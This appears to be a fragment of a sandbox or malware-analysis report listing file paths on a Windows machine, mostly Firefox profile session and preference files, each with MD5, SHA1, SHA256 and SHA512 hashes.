SHA1 8fec405a9bd9ca007f130ed3ace4a3ffc1fd7043
SHA256 94a7270f065d3a53a6052a343148506fdbee2963f3cdc2110825ab302ba93268
SHA512 bf25a58fe019058580f3076a23c41b35cbd3c8188227b0cd80a43be035531cd6349daffdf91e72c97eb3e7f17459590d08c0e72c49838f48a3971cd06bc14228

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 94afe7733d1ad32b97d2eb9509d935e0
SHA1 41e65d6db714148a03271c08441ac8770fbfb531
SHA256 7a2542ead86ba5de4942c275a13c7fd3b352251d10b74995faec3ef0e5357133
SHA512 ca94db3b1d3f91946235a293b56f688fb70af87d6a5277d1ca58fb0e59c3492001fcd7cd59e758db39b75f8948a939ee60783d208354c56a964339a9550924b3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3b1psp2h.default-release\sessionstore-backups\recovery.jsonlz4

MD5 52b37c9644d9396a9da903c8c3749dd7
SHA1 a272a9578f4bd57c7bbedfd90ab7bd29201abdb7
SHA256 8212c7856e4be4c09e65199970fb5e9272514d2750dd8ef4624c1dcb399fc138
SHA512 8293dd0b33d6b1a50d33e671d723deea0fe15029532acd2a62194d903c4d64837cbac60d0d6078533922d87dbb144d21f87c255761ba3406b1a29353a8bf6748

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3b1psp2h.default-release\sessionCheckpoints.json

MD5 2ad4fe43dc84c6adbdfd90aaba12703f
SHA1 28a6c7eff625a2da72b932aa00a63c31234f0e7f
SHA256 ecb4133a183cb6c533a1c4ded26b663e2232af77db1a379f9bd68840127c7933
SHA512 2ee947dcf3eb05258c7a8c45cb60082a697dbe6d683152fe7117d20f7d3eb2beaaf5656154b379193cdc763d7f2f3b114cf61b4dd0f8a65326e662165ccf89cc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3b1psp2h.default-release\sessionstore.jsonlz4

MD5 26bc52242c05bbf30ab8f2f862a846a0
SHA1 8bebe83d088d5db09f2541f945b9f5cf53077385
SHA256 50f4c26e940b7d062132a982a5138f6be5a4956396dea278f09db6c115ebf642
SHA512 1fc2a8a7bb5e9767ab5cd007bd9169334631e93a0c91eaff3b0c6accac449615c1eb759b5b138f95ee573eb8a22166ba158129013378b0107a767e0cdb7d85ef

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3b1psp2h.default-release\prefs-1.js

MD5 e59f1e13c401da4a2992c9fb4b928821
SHA1 f32af5ccea94e4e4d195ab7ae52bd6578b1574b0
SHA256 004c271fab779213f1b93d6bb1b6dd0a37ddcce81210327c76567884dc314537
SHA512 96612e68b57708d203012cadf41d6f8f1dc3cb0af2f401c5f02367e3b73bf239a0ea43aa5c74bfddb9d1108d49f4a0510fac246f6f8865b9f7caa48395cbf4b6